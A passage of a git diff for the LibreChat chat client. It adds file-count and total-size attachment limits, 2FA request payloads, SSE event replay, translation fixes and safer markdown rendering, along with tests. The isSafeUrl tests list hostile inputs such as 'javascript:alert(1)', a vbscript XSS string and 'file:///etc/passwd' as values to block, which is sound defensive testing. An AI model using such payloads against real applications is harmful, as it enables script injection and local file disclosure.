`${localize('com_ui_attach_error_total_size')} ${endpointFileConfig.totalSizeLimit / megabyte} MB (${endpoint})`, + status: 'error', + }); + return; + } + } + addFile({ progress: 1, attached: true, @@ -175,7 +199,7 @@ export default function DataTable({ columns, data }: DataTablePro metadata: fileData.metadata, }); }, - [addFile, fileMap, conversation, localize, showToast, fileConfig], + [addFile, files, fileMap, conversation, localize, showToast, fileConfig], ); const filenameFilter = table.getColumn('filename')?.getFilterValue() as string; diff --git a/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx b/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx new file mode 100644 index 0000000000..2639d3c100 --- /dev/null +++ b/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx @@ -0,0 +1,239 @@ +import React from 'react'; +import { render, screen, fireEvent } from '@testing-library/react'; +import { FileSources } from 'librechat-data-provider'; +import type { TFile } from 'librechat-data-provider'; +import type { ExtendedFile } from '~/common'; +import DataTable from '../PanelTable'; +import { columns } from '../PanelColumns'; + +const mockShowToast = jest.fn(); +const mockAddFile = jest.fn(); + +let mockFileMap: Record = {}; +let mockFiles: Map = new Map(); +let mockConversation: Record | null = { endpoint: 'openAI' }; +let mockRawFileConfig: Record | null = { + endpoints: { + openAI: { fileLimit: 10, supportedMimeTypes: ['application/pdf', 'text/plain'] }, + }, +}; + +jest.mock('@librechat/client', () => ({ + Table: ({ children, ...props }: { children: React.ReactNode }) => ( + {children}
+ ), + Button: ({ + children, + ...props + }: { children: React.ReactNode } & React.ButtonHTMLAttributes) => ( + + ), + TableRow: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableHead: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableBody: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableCell: ({ + children, + ...props + }: { children: React.ReactNode } & React.TdHTMLAttributes) => ( + {children} + ), + FilterInput: () => , + TableHeader: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + useToastContext: () => ({ showToast: mockShowToast }), +})); + +jest.mock('~/Providers', () => ({ + useFileMapContext: () => mockFileMap, + useChatContext: () => ({ + files: mockFiles, + setFiles: jest.fn(), + conversation: mockConversation, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useUpdateFiles: () => ({ addFile: mockAddFile }), +})); + +jest.mock('~/data-provider', () => ({ + useGetFileConfig: ({ select }: { select?: (d: unknown) => unknown }) => ({ + data: select != null ? select(mockRawFileConfig) : mockRawFileConfig, + }), +})); + +jest.mock('~/components/Chat/Input/Files/MyFilesModal', () => ({ + MyFilesModal: () => null, +})); + +jest.mock('../PanelFileCell', () => ({ row }: { row: { original: TFile } }) => ( + {row.original?.filename} +)); + +function makeFile(overrides: Partial = {}): TFile { + return { + user: 'user-1', + file_id: 'file-1', + bytes: 1024, + embedded: false, + filename: 'test.pdf', + filepath: '/files/test.pdf', + object: 'file', + type: 'application/pdf', + usage: 0, + source: FileSources.local, + ...overrides, + }; +} + +function makeExtendedFile(overrides: Partial = {}): ExtendedFile { + return { + file_id: 'ext-1', + size: 1024, + progress: 1, + source: FileSources.local, + ...overrides, + }; +} + +function renderTable(data: TFile[]) { + return render(); +} + +function clickFilenameCell() { + const cells = screen.getAllByRole('button'); + const filenameCell = cells.find( + (cell) => cell.tagName === 'TD' && cell.textContent && !cell.textContent.includes('com_ui_'), + ); + if (!filenameCell) { + throw new Error('Could not find filename cell with role="button" — check mock setup'); + } + fireEvent.click(filenameCell); + return filenameCell; +} + +describe('PanelTable handleFileClick', () => { + beforeEach(() => { + mockShowToast.mockClear(); + mockAddFile.mockClear(); + mockFiles = new Map(); + mockConversation = { endpoint: 'openAI' }; + mockRawFileConfig = { + endpoints: { + openAI: { + fileLimit: 5, + totalSizeLimit: 10, + supportedMimeTypes: ['application/pdf', 'text/plain'], + }, + }, + }; + }); + + it('calls addFile when within file limits', () => { + const file = makeFile(); + mockFileMap = { [file.file_id]: file }; + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + expect(mockAddFile).toHaveBeenCalledWith( + expect.objectContaining({ + file_id: file.file_id, + attached: true, + progress: 1, + }), + ); + expect(mockShowToast).not.toHaveBeenCalledWith(expect.objectContaining({ status: 'error' })); + }); + + it('blocks attachment when fileLimit is reached', () => { + const file = makeFile({ file_id: 'new-file', filename: 'new.pdf' }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map( + Array.from({ length: 5 }, (_, i) => [ + `existing-${i}`, + makeExtendedFile({ file_id: `existing-${i}` }), + ]), + ); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).not.toHaveBeenCalled(); + expect(mockShowToast).toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_limit'), + status: 'error', + }), + ); + }); + + it('blocks attachment when totalSizeLimit would be exceeded', () => { + const MB = 1024 * 1024; + const largeFile = makeFile({ file_id: 'large-file', bytes: 6 * MB }); + mockFileMap = { [largeFile.file_id]: largeFile }; + + mockFiles = new Map([ + ['existing-1', makeExtendedFile({ file_id: 'existing-1', size: 5 * MB })], + ]); + + renderTable([largeFile]); + clickFilenameCell(); + + expect(mockAddFile).not.toHaveBeenCalled(); + expect(mockShowToast).toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_total_size'), + status: 'error', + }), + ); + }); + + it('does not double-count size of already-attached file', () => { + const MB = 1024 * 1024; + const file = makeFile({ file_id: 'reattach', bytes: 5 * MB }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map([ + ['reattach', makeExtendedFile({ file_id: 'reattach', size: 5 * MB })], + ['other', makeExtendedFile({ file_id: 'other', size: 4 * MB })], + ]); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + expect(mockShowToast).not.toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_total_size'), + }), + ); + }); + + it('allows attachment when just under fileLimit', () => { + const file = makeFile({ file_id: 'under-limit' }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map( + Array.from({ length: 4 }, (_, i) => [ + `existing-${i}`, + makeExtendedFile({ file_id: `existing-${i}` }), + ]), + ); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + }); +}); diff --git a/client/src/data-provider/Auth/mutations.ts b/client/src/data-provider/Auth/mutations.ts index 298ddd9b64..9930e42b4f 100644 --- a/client/src/data-provider/Auth/mutations.ts +++ b/client/src/data-provider/Auth/mutations.ts @@ -68,14 +68,14 @@ export const useRefreshTokenMutation = ( /* User */ export const useDeleteUserMutation = ( - options?: t.MutationOptions, -): UseMutationResult => { + options?: t.MutationOptions, +): UseMutationResult => { const queryClient = useQueryClient(); const clearStates = useClearStates(); const resetDefaultPreset = useResetRecoilState(store.defaultPreset); return useMutation([MutationKeys.deleteUser], { - mutationFn: () => dataService.deleteUser(), + mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload), ...(options || {}), onSuccess: (...args) => { resetDefaultPreset(); @@ -90,11 +90,11 @@ export const useDeleteUserMutation = ( export const useEnableTwoFactorMutation = (): UseMutationResult< t.TEnable2FAResponse, unknown, - void, + t.TEnable2FARequest | undefined, unknown > => { const queryClient = useQueryClient(); - return useMutation(() => dataService.enableTwoFactor(), { + return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), { onSuccess: (data) => { queryClient.setQueryData([QueryKeys.user, '2fa'], data); }, @@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult< export const useRegenerateBackupCodesMutation = (): UseMutationResult< t.TRegenerateBackupCodesResponse, unknown, - void, + t.TRegenerateBackupCodesRequest | undefined, unknown > => { const queryClient = useQueryClient(); - return useMutation(() => dataService.regenerateBackupCodes(), { - onSuccess: (data) => { - queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); + return useMutation( + (payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload), + { + onSuccess: (data) => { + queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); + }, }, - }); + ); }; export const useVerifyTwoFactorTempMutation = ( diff --git a/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts b/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts index f9f29e0c56..e46a285c50 100644 --- a/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts +++ b/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts @@ -112,7 +112,7 @@ describe('useArtifactProps', () => { expect(result.current.files['content.md']).toBe('# No content provided'); }); - it('should provide marked-react dependency', () => { + it('should provide react-markdown dependency', () => { const artifact = createArtifact({ type: 'text/markdown', content: '# Test', @@ -120,7 +120,9 @@ describe('useArtifactProps', () => { const { result } = renderHook(() => useArtifactProps({ artifact })); - expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('marked-react'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('react-markdown'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-gfm'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-breaks'); }); it('should update files when content changes', () => { diff --git a/client/src/hooks/Input/useQueryParams.ts b/client/src/hooks/Input/useQueryParams.ts index b29f408a3a..85b5d8838b 100644 --- a/client/src/hooks/Input/useQueryParams.ts +++ b/client/src/hooks/Input/useQueryParams.ts @@ -12,6 +12,7 @@ import type { import { clearModelForNonEphemeralAgent, removeUnavailableTools, + specDisplayFieldReset, processValidSettings, getModelSpecIconURL, getConvoSwitchLogic, @@ -128,13 +129,10 @@ export default function useQueryParams({ endpointsConfig, }); - let resetParams = {}; + const resetFields = newPreset.spec == null ? specDisplayFieldReset : {}; if (newPreset.spec == null) { - template.spec = null; - template.iconURL = null; - template.modelLabel = null; - resetParams = { spec: null, iconURL: null, modelLabel: null }; - newPreset = { ...newPreset, ...resetParams }; + Object.assign(template, specDisplayFieldReset); + newPreset = { ...newPreset, ...specDisplayFieldReset }; } // Sync agent_id from newPreset to template, then clear model if non-ephemeral agent @@ -152,7 +150,7 @@ export default function useQueryParams({ conversation: { ...(conversation ?? {}), endpointType: template.endpointType, - ...resetParams, + ...resetFields, }, preset: template, cleanOutput: newPreset.spec != null && newPreset.spec !== '', diff --git a/client/src/hooks/SSE/useResumableSSE.ts b/client/src/hooks/SSE/useResumableSSE.ts index 831bf042ad..4d4cb4841a 100644 --- a/client/src/hooks/SSE/useResumableSSE.ts +++ b/client/src/hooks/SSE/useResumableSSE.ts @@ -226,12 +226,12 @@ export default function useResumableSSE( if (data.sync != null) { console.log('[ResumableSSE] SYNC received', { runSteps: data.resumeState?.runSteps?.length ?? 0, + pendingEvents: data.pendingEvents?.length ?? 0, }); const runId = v4(); setActiveRunId(runId); - // Replay run steps if (data.resumeState?.runSteps) { for (const runStep of data.resumeState.runSteps) { stepHandler({ event: 'on_run_step', data: runStep }, { @@ -241,19 +241,15 @@ export default function useResumableSSE( } } - // Set message content from aggregatedContent if (data.resumeState?.aggregatedContent && userMessage?.messageId) { const messages = getMessages() ?? []; const userMsgId = userMessage.messageId; const serverResponseId = data.resumeState.responseMessageId; - // Find the EXACT response message - prioritize responseMessageId from server - // This is critical when there are multiple responses to the same user message let responseIdx = -1; if (serverResponseId) { responseIdx = messages.findIndex((m) => m.messageId === serverResponseId); } - // Fallback: find by parentMessageId pattern (for new messages) if (responseIdx < 0) { responseIdx = messages.findIndex( (m) => @@ -272,7 +268,6 @@ export default function useResumableSSE( }); if (responseIdx >= 0) { - // Update existing response message with aggregatedContent const updated = [...messages]; const oldContent = updated[responseIdx]?.content; updated[responseIdx] = { @@ -285,25 +280,34 @@ export default function useResumableSSE( newContentLength: data.resumeState.aggregatedContent?.length, }); setMessages(updated); - // Sync both content handler and step handler with the updated message - // so subsequent deltas build on synced content, not stale content resetContentHandler(); syncStepMessage(updated[responseIdx]); console.log('[ResumableSSE] SYNC complete, handlers synced'); } else { - // Add new response message const responseId = serverResponseId ?? `${userMsgId}_`; - setMessages([ - ...messages, - { - messageId: responseId, - parentMessageId: userMsgId, - conversationId: currentSubmission.conversation?.conversationId ?? '', - text: '', - content: data.resumeState.aggregatedContent, - isCreatedByUser: false, - } as TMessage, - ]); + const newMessage = { + messageId: responseId, + parentMessageId: userMsgId, + conversationId: currentSubmission.conversation?.conversationId ?? '', + text: '', + content: data.resumeState.aggregatedContent, + isCreatedByUser: false, + } as TMessage; + setMessages([...messages, newMessage]); + resetContentHandler(); + syncStepMessage(newMessage); + } + } + + if (data.pendingEvents?.length > 0) { + console.log(`[ResumableSSE] Replaying ${data.pendingEvents.length} pending events`); + const submission = { ...currentSubmission, userMessage } as EventSubmission; + for (const pendingEvent of data.pendingEvents) { + if (pendingEvent.event != null) { + stepHandler(pendingEvent, submission); + } else if (pendingEvent.type != null) { + contentHandler({ data: pendingEvent, submission }); + } } } diff --git a/client/src/locales/en/translation.json b/client/src/locales/en/translation.json index 72cd702622..315d35d6bb 100644 --- a/client/src/locales/en/translation.json +++ b/client/src/locales/en/translation.json @@ -368,6 +368,7 @@ "com_error_illegal_model_request": "The model \"{{0}}\" is not available for {{1}}. Please select a different model.", "com_error_input_length": "The latest message token count is too long, exceeding the token limit, or your token limit parameters are misconfigured, adversely affecting the context window. More info: {{0}}. Please shorten your message, adjust the max context size from the conversation parameters, or fork the conversation to continue.", "com_error_invalid_agent_provider": "The \"{{0}}\" provider is not available for use with Agents. Please go to your agent's settings and select a currently available provider.", + "com_error_invalid_base_url": "The base URL you provided targets a restricted address. Please use a valid external URL and try again.", "com_error_invalid_user_key": "Invalid key provided. Please provide a valid key and try again.", "com_error_missing_model": "No model selected for {{0}}. Please select a model and try again.", "com_error_models_not_loaded": "Models configuration could not be loaded. Please refresh the page and try again.", @@ -639,6 +640,7 @@ "com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings", "com_ui_2fa_invalid": "Invalid two-factor authentication code", "com_ui_2fa_setup": "Setup 2FA", + "com_ui_2fa_verification_required": "Enter your 2FA code to continue", "com_ui_2fa_verified": "Successfully verified Two-Factor Authentication", "com_ui_accept": "I accept", "com_ui_action_button": "Action Button", @@ -746,8 +748,10 @@ "com_ui_at_least_one_owner_required": "At least one owner is required", "com_ui_attach_error": "Cannot attach file. Create or select a conversation, or try refreshing the page.", "com_ui_attach_error_disabled": "File uploads are disabled for this endpoint", + "com_ui_attach_error_limit": "File limit reached:", "com_ui_attach_error_openai": "Cannot attach Assistant files to other endpoints", "com_ui_attach_error_size": "File size limit exceeded for endpoint:", + "com_ui_attach_error_total_size": "Total file size limit exceeded for endpoint:", "com_ui_attach_error_type": "Unsupported file type for endpoint:", "com_ui_attach_remove": "Remove file", "com_ui_attach_warn_endpoint": "Non-Assistant files may be ignored without a compatible tool", diff --git a/client/src/locales/fr/translation.json b/client/src/locales/fr/translation.json index c9d78ac3f5..7838b33739 100644 --- a/client/src/locales/fr/translation.json +++ b/client/src/locales/fr/translation.json @@ -1203,7 +1203,7 @@ "com_ui_upload_image_input": "Téléverser une image", "com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite", "com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo", - "com_ui_upload_ocr_text": "Téléchager en tant que texte", + "com_ui_upload_ocr_text": "Télécharger en tant que texte", "com_ui_upload_provider": "Télécharger vers le fournisseur", "com_ui_upload_success": "Fichier téléversé avec succès", "com_ui_upload_type": "Sélectionner le type de téléversement", diff --git a/client/src/locales/lv/translation.json b/client/src/locales/lv/translation.json index 76c2db24ea..57794a9e2a 100644 --- a/client/src/locales/lv/translation.json +++ b/client/src/locales/lv/translation.json @@ -39,7 +39,7 @@ "com_agents_description_card": "Apraksts: {{description}}", "com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit", "com_agents_empty_state_heading": "Nav atrasts neviens aģents", - "com_agents_enable_file_search": "Iespējot vektorizēto meklēšanu", + "com_agents_enable_file_search": "Iespējot meklēšanu dokumentos", "com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.", "com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.", "com_agents_error_category_title": "Kategorija Kļūda", @@ -66,7 +66,7 @@ "com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.", "com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.", "com_agents_file_context_label": "Pievienot failu kā kontekstu", - "com_agents_file_search_disabled": "Lai varētu iespējot vektorizētu meklēšanu ir jāizveido aģents.", + "com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.", "com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.", "com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā", "com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents", @@ -126,7 +126,7 @@ "com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta", "com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu", "com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}", - "com_assistants_file_search": "Vektorizētā Meklēšana (RAG)", + "com_assistants_file_search": "Meklēšana dokumentos", "com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.", "com_assistants_function_use": "Izmantotais asistents {{0}}", "com_assistants_image_vision": "Attēla redzējums", @@ -136,7 +136,7 @@ "com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.", "com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits", "com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums", - "com_assistants_non_retrieval_model": "Šajā modelī vektorizētā meklēšana nav iespējota. Lūdzu, izvēlieties citu modeli.", + "com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.", "com_assistants_retrieval": "Atgūšana", "com_assistants_running_action": "Darbība palaista", "com_assistants_running_var": "Strādā {{0}}", @@ -232,7 +232,7 @@ "com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", - "com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", + "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_assistant": "Asistents", "com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", @@ -1486,7 +1486,7 @@ "com_ui_version_var": "Versija {{0}}", "com_ui_versions": "Versijas", "com_ui_view_memory": "Skatīt atmiņu", - "com_ui_web_search": "Tīmekļa meklēšana", + "com_ui_web_search": "Meklēšana tīmeklī", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", diff --git a/client/src/routes/ChatRoute.tsx b/client/src/routes/ChatRoute.tsx index dcb58c3f49..a17d349037 100644 --- a/client/src/routes/ChatRoute.tsx +++ b/client/src/routes/ChatRoute.tsx @@ -6,20 +6,21 @@ import { Constants, EModelEndpoint } from 'librechat-data-provider'; import { useGetModelsQuery } from 'librechat-data-provider/react-query'; import type { TPreset } from 'librechat-data-provider'; import { - useNewConvo, - useAppStartup, + mergeQuerySettingsWithSpec, + processValidSettings, + getDefaultModelSpec, + getModelSpecPreset, + isNotFoundError, + logger, +} from '~/utils'; +import { useAssistantListMap, useIdChangeEffect, + useAppStartup, + useNewConvo, useLocalize, } from '~/hooks'; import { useGetConvoIdQuery, useGetStartupConfig, useGetEndpointsQuery } from '~/data-provider'; -import { - getDefaultModelSpec, - getModelSpecPreset, - processValidSettings, - logger, - isNotFoundError, -} from '~/utils'; import { ToolCallsMapProvider } from '~/Providers'; import ChatView from '~/components/Chat/ChatView'; import { NotificationSeverity } from '~/common'; @@ -102,9 +103,10 @@ export default function ChatRoute() { }); const querySettings = processValidSettings(queryParams); - return Object.keys(querySettings).length > 0 - ? { ...specPreset, ...querySettings } - : specPreset; + if (Object.keys(querySettings).length > 0) { + return mergeQuerySettingsWithSpec(specPreset, querySettings); + } + return specPreset; }; if (isNewConvo && endpointsQuery.data && modelsQuery.data) { diff --git a/client/src/utils/__tests__/markdown.test.ts b/client/src/utils/__tests__/markdown.test.ts index fcc0f169e6..9734e0e18a 100644 --- a/client/src/utils/__tests__/markdown.test.ts +++ b/client/src/utils/__tests__/markdown.test.ts @@ -1,4 +1,72 @@ -import { getMarkdownFiles } from '../markdown'; +import { isSafeUrl, getMarkdownFiles } from '../markdown'; + +describe('isSafeUrl', () => { + it('allows https URLs', () => { + expect(isSafeUrl('https://example.com')).toBe(true); + }); + + it('allows http URLs', () => { + expect(isSafeUrl('http://example.com/path')).toBe(true); + }); + + it('allows mailto links', () => { + expect(isSafeUrl('mailto:user@example.com')).toBe(true); + }); + + it('allows tel links', () => { + expect(isSafeUrl('tel:+1234567890')).toBe(true); + }); + + it('allows relative paths', () => { + expect(isSafeUrl('/path/to/page')).toBe(true); + expect(isSafeUrl('./relative')).toBe(true); + expect(isSafeUrl('../parent')).toBe(true); + }); + + it('allows anchor links', () => { + expect(isSafeUrl('#section')).toBe(true); + }); + + it('blocks javascript: protocol', () => { + expect(isSafeUrl('javascript:alert(1)')).toBe(false); + }); + + it('blocks javascript: with leading whitespace', () => { + expect(isSafeUrl(' javascript:alert(1)')).toBe(false); + }); + + it('blocks javascript: with mixed case', () => { + expect(isSafeUrl('JavaScript:alert(1)')).toBe(false); + }); + + it('blocks data: protocol', () => { + expect(isSafeUrl('data:text/html,x')).toBe(false); + }); + + it('blocks blob: protocol', () => { + expect(isSafeUrl('blob:http://example.com/uuid')).toBe(false); + }); + + it('blocks vbscript: protocol', () => { + expect(isSafeUrl('vbscript:MsgBox("xss")')).toBe(false); + }); + + it('blocks file: protocol', () => { + expect(isSafeUrl('file:///etc/passwd')).toBe(false); + }); + + it('blocks empty strings', () => { + expect(isSafeUrl('')).toBe(false); + }); + + it('blocks whitespace-only strings', () => { + expect(isSafeUrl(' ')).toBe(false); + }); + + it('blocks unknown/custom protocols', () => { + expect(isSafeUrl('custom:payload')).toBe(false); + }); +}); describe('markdown artifacts', () => { describe('getMarkdownFiles', () => { @@ -41,7 +109,7 @@ describe('markdown artifacts', () => { const markdown = '# Test'; const files = getMarkdownFiles(markdown); - expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import Markdown from'); + expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import ReactMarkdown from'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('MarkdownRendererProps'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain( 'export default MarkdownRenderer', @@ -162,13 +230,29 @@ describe('markdown artifacts', () => { }); describe('markdown component structure', () => { - it('should generate a MarkdownRenderer component that uses marked-react', () => { + it('should generate a MarkdownRenderer component with safe markdown rendering', () => { const files = getMarkdownFiles('# Test'); const rendererCode = files['/components/ui/MarkdownRenderer.tsx']; - // Verify the component imports and uses Markdown from marked-react - expect(rendererCode).toContain("import Markdown from 'marked-react'"); - expect(rendererCode).toContain('{content}'); + expect(rendererCode).toContain("import ReactMarkdown from 'react-markdown'"); + expect(rendererCode).toContain("import remarkBreaks from 'remark-breaks'"); + expect(rendererCode).toContain('skipHtml={true}'); + expect(rendererCode).toContain('SAFE_PROTOCOLS'); + expect(rendererCode).toContain('isSafeUrl'); + expect(rendererCode).toContain('urlTransform={urlTransform}'); + expect(rendererCode).toContain('remarkPlugins={remarkPlugins}'); + expect(rendererCode).toContain('isSafeUrl(url) ? url : null'); + }); + + it('should embed isSafeUrl logic matching the exported version', () => { + const files = getMarkdownFiles('# Test'); + const rendererCode = files['/components/ui/MarkdownRenderer.tsx']; + + expect(rendererCode).toContain("new Set(['http:', 'https:', 'mailto:', 'tel:'])"); + expect(rendererCode).toContain('new URL(trimmed).protocol'); + expect(rendererCode).toContain("trimmed.startsWith('/')"); + expect(rendererCode).toContain("trimmed.startsWith('#')"); + expect(rendererCode).toContain("trimmed.startsWith('.')"); }); it('should pass markdown content to the Markdown component', () => { diff --git a/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts b/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts new file mode 100644 index 0000000000..76e104f62f --- /dev/null +++ b/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts @@ -0,0 +1,152 @@ +import { EModelEndpoint } from 'librechat-data-provider'; +import type { TPreset } from 'librechat-data-provider'; +import { mergeQuerySettingsWithSpec, specDisplayFieldReset } from '../endpoints'; + +describe('mergeQuerySettingsWithSpec', () => { + const specPreset: TPreset = { + endpoint: EModelEndpoint.openAI, + model: 'gpt-4', + spec: 'my-spec', + iconURL: 'https://example.com/icon.png', + modelLabel: 'My Custom GPT', + greeting: 'Hello from the spec!', + temperature: 0.7, + }; + + describe('when specPreset is active and query has no spec', () => { + it('clears all spec display fields for agent share links', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.agent_id).toBe('agent_123'); + expect(result.endpoint).toBe(EModelEndpoint.agents); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + + it('preserves non-display settings from the spec base', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.temperature).toBe(0.7); + }); + + it('clears spec display fields for assistant share links', () => { + const querySettings: TPreset = { + assistant_id: 'asst_abc', + endpoint: EModelEndpoint.assistants, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.assistant_id).toBe('asst_abc'); + expect(result.endpoint).toBe(EModelEndpoint.assistants); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + + it('clears spec display fields for model override links', () => { + const querySettings: TPreset = { + model: 'claude-sonnet-4-20250514', + endpoint: EModelEndpoint.anthropic, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.model).toBe('claude-sonnet-4-20250514'); + expect(result.endpoint).toBe(EModelEndpoint.anthropic); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + }); + + describe('when query explicitly sets a spec', () => { + it('preserves spec display fields from the base', () => { + const querySettings = { spec: 'other-spec' } as TPreset; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.spec).toBe('other-spec'); + expect(result.iconURL).toBe('https://example.com/icon.png'); + expect(result.modelLabel).toBe('My Custom GPT'); + expect(result.greeting).toBe('Hello from the spec!'); + }); + }); + + describe('when specPreset is undefined (no spec configured)', () => { + it('returns querySettings without 